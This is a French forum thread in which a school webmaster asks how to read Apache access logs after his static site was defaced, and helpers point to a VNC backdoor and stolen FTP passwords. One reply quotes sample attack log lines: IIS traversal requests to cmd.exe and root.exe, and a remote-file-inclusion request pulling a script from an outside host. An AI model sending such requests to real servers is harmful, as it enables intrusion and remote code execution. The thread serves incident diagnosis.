comment lire des fichiers acess_log ? [urgent, mon site: hacké] - Hébergement - Réseaux grand public / SoHo
Marsh Posté le 29-10-2007 à 11:13:18
Google -> "apache access_log"
1er résultat :
http://httpd.apache.org/docs/2.0/logs.html
Marsh Posté le 29-10-2007 à 11:14:52
ReplyMarsh Posté le 29-10-2007 à 11:16:59
merci a toi moon , mais désolé je n'y pige pas grand chose...d'autant que je pensais qu'apache ne concernait que le monde de linux...
je suis affligé par mon manque de conaissances dans ce domaine
il existe pas juste un soft que je puisse installer puis faire un fichier/ouvrir/access log et le lire dans une interface correcte ( en esperant que j'y pige quelque chose) ?
Marsh Posté le 29-10-2007 à 11:29:12
Et bien tu l'ouvres dans le bloc notes, et tu lis chaque ligne comme indiqué sur la page que je t'ai indiquée.
Marsh Posté le 29-10-2007 à 11:35:58
désolé, mais c'est dur...en anglais en plus, j'ai du mal
comment comprendre une ligne comme ça:[27/Oct/2007:00:15:09 +0100] "GET /imagesactu/noel1.jpg HTTP/1.1" 200 15828 "-" "Googlebot-Image/1.0"
78.114.37.204 - -
je pensais que les logs access me donneraient les connexion a ma console de gestion...mais ça evoque pleins de fichiers du site
Marsh Posté le 29-10-2007 à 11:39:42
ou alors cette ligne:
27/Oct/2007:14:11:28 +0100] "GET /index.htm HTTP/1.1" 304 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)"
spider-prs-ta09.proxy.aol.com - -
si je comprendsbien, le 27 a 14h quelqu'un a modifié index .htm. et son IP n'apparait pas car il est derriere un proxy ? (spider-prs-ta09.proxy.aol.com)
merci pour votre aide les amis, je suis vraiment tres enmer embeté
Marsh Posté le 29-10-2007 à 11:39:58
Les logs Apache te communiquent les accès aux fichiers dispo sur le serveur web, c'est à dire ton site.
Donc dans l'ordre :
|
En l'occurence c'est le bot google qui indexe ton site.
Marsh Posté le 29-10-2007 à 11:40:18
Là ça te dis que l'ip 78.114.37.204 qui est le bot google a accédé avec succès (200) à l'image noel1.jpg qui fait 15828 octets le 27 octobre à minuit 15
Marsh Posté le 29-10-2007 à 11:42:48
vous avez bien de la chance de parler cette langue
est ce qu' a votre avis il y a moyen avec ces fichiers access log de savoir un peu ce qui nous est arrivé, d'avoir des infos sur le hacker ?
Marsh Posté le 29-10-2007 à 11:47:13
Oui fais une recherche sur la page d'admin.
Cependant peut être que la personne a utilisé un autre moyen, la meilleur méthode est de tout checker
Marsh Posté le 29-10-2007 à 13:44:50
pardon, je m'exprime mal : comment faire une recherche precisement sur la page d'admin ?
Marsh Posté le 30-10-2007 à 10:45:40
il y'a personne qui aurait la patience d'aider un newbie comme moi ?
vous comprenez ce qui est arrivé etait assez humiliant pour notre ecole et j'aimerais savoir si la securité de nexlink laisse a desirer
Marsh Posté le 30-10-2007 à 10:51:00
C'est un site cree de toutes pieces par toi ou un collegue, un site base sur de l'existant, statique ou dynamique ?
Marsh Posté le 09-11-2007 à 10:10:45
salut les amis
je reviens a la charge avec plus d'explications:
tout d'abord le site , c'est un site en html tout bete que j'ai fait et que j'administre
j'ai trouvé un trojan sur une des machines que j'utilise pour publier le site , il s'agit de backdoor win32 vnc
ç'est probablement la source du probleme
pour les logs: mon probleme etait que dans le bloc note il n'yavait aucun saut de ligne, j'ai ouvert ça dans firefox et là, miracle, j'y vois beaucoup plus claire
il n'a pas grand chose sur ces logs...surtout des get, mais il y'a UN truc , qui je pense est important
à 16h46 , heure ou je suis en bagnole en train de rentrer chez moi, voila ce qu'il y'a:
*APoitiers-154-1-14-95.w86-196.abo.wanadoo.fr - - [26/Oct/2007:16:46:57 +0100] "_POST /index.htm HTTP/1.1_" 200 4753 "http://..........." "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
donc si je me trompe pas, c'est un accés a la console d'admin , c'est le fichier index qui est publié
j'ajoutequ'on m'a prevenu que le site etait hacké vers 17h, ça correspond
est ce que je tiens mon gars ?
qu'est ce que je fais maintenant les amis?
Marsh Posté le 09-11-2007 à 21:33:21
ment@l -> si tu mets l'adresse de ta console d'administration, c'est encore la meilleure façon de se faire hacker...
Marsh Posté le 10-11-2007 à 11:32:19
mince...
mais j'ai quand meme viré le trojan et changé tous les mots de passe
Marsh Posté le 12-11-2007 à 14:46:22
sinon...personne ne voudrait m'aider en repondant a cette question :
le log que j'ai posté me permet il d'etre sur de bien tenir le gars qui m'a hacké le site ? (dans la mesure ou c'est un acces console, et que ce n'est pas moi...)
Marsh Posté le 14-11-2007 à 14:17:07
bon...ben je suis étonné , personne ne veut m'apporter la moindre aide sur ce coup?
Marsh Posté le 15-11-2007 à 06:38:06
Une console d'admin en racine du serveur http, c'est pas malin malin
sinon, je pense sincèrement que les logs ftp te seront plus utiles que tes logs apache
surtout si on a piraté une machine client avec un backdoor vnc et que ton site est en html sans langage de prog derrière ton pirate a pompé les passwords de ton client ftp (c'est pas bien de les sauvegarder) et a du se connecter tout simplement... parce que remplacer des fichiers sur un apache sans cgi/php/perl derrière, c'est un peu dur ...
Tu aurais eu une attaque par apache, ca ressemblerais plus a des trucs du genre .. (avec des codes 200 a la fin )
218.92.63.250 - - [28/Sep/2006:17:16:17 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:19 +0200] "GET /scripts/root.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:20 +0200] "GET /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:46 +0200] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:47 +0200] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir" 404 -
210.245.226.61 - - [24/Mar/2007:13:01:02 +0100] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 232
Marsh Posté le 15-11-2007 à 08:23:32
Manaloup a écrit : Une console d'admin en racine du serveur http, c'est pas malin malin |
merci pour ton aide manaloup
pour la console d'admin a la racine du site, je crois que c'est nexlink, l'hebergeur qui decide ce genre de chose, non?
pour les logs, c'est les seuls que j'ai trouvé sur la console d'admin, et nexlink sont pas tres conciliants, surtout quand ils sentent qu'ils ont affaire a un newb
le backdoor vnc, comment j'ai pu le choper, a il kek chose a voir avec ultravnc (que j'utilise)
merci pour le conseil cocernant le mot de passe ftp, je l'applique illico
pour ce qui est du log que j'ai affiché , le post index par la console d'admin a 16H46, est ce que tu pense que c'est mon pirate ?
Marsh Posté le 04-08-2008 à 18:06:35
Je@nb a écrit : un grep déjà mais sinon je ne pense pas qu'il y ai des outils plus "graphique" |
ApHeMo - Apache Health Monitoring
http://www.xxxxxxxxxxxxxxxxxxx.com/?aphemo
J'en suis le développeur, tu peux me contacter si t'as besoin d'un coup de main avec l'appli.
Marsh Posté le 05-08-2008 à 09:38:51
Remonter un topic qui a bientôt un an histoire de faire de la pub, non.
Marsh Posté le 29-10-2007 à 11:08:30
bonjour
ce week end le site du bahut ou je travail a été hacké : on m'a viré le contenu du repertoire et remplacé par du porno (super , c'est les parents d'eleve qui nous ont prevenus)
j'ai modifié tous les mots de passe mais maintenant je voudrais faire mon enquete (au moins savoir si c'est quelqu'un qu'aurait tripoté mon ordi portable ou si c'est du hacking en bonne et due forme)
le site a ete hacké deux fois et je sais qu'il a été publié vendredi entre 18H et 20H30 au plus large. J'ai sur ma console d'administration (je suis hebergé par nexlink) les logs de connection, j'ai telechargé en particulier les access_log qui devraient me permettre de connaitre les connection a la console d'admin. . Est ce que ça peut m'etre utile pour retrouver eventuellement une adresse ip? avec quel soft me conseillez vous de lire ces logs pour avoir des details? car avec le bloc note je n'y comprends rien
si vous avez des conseils ou des infos, merci je suis plutot mauvais en webmastering
Message édité par ment@l le 29-10-2007 à 11:10:34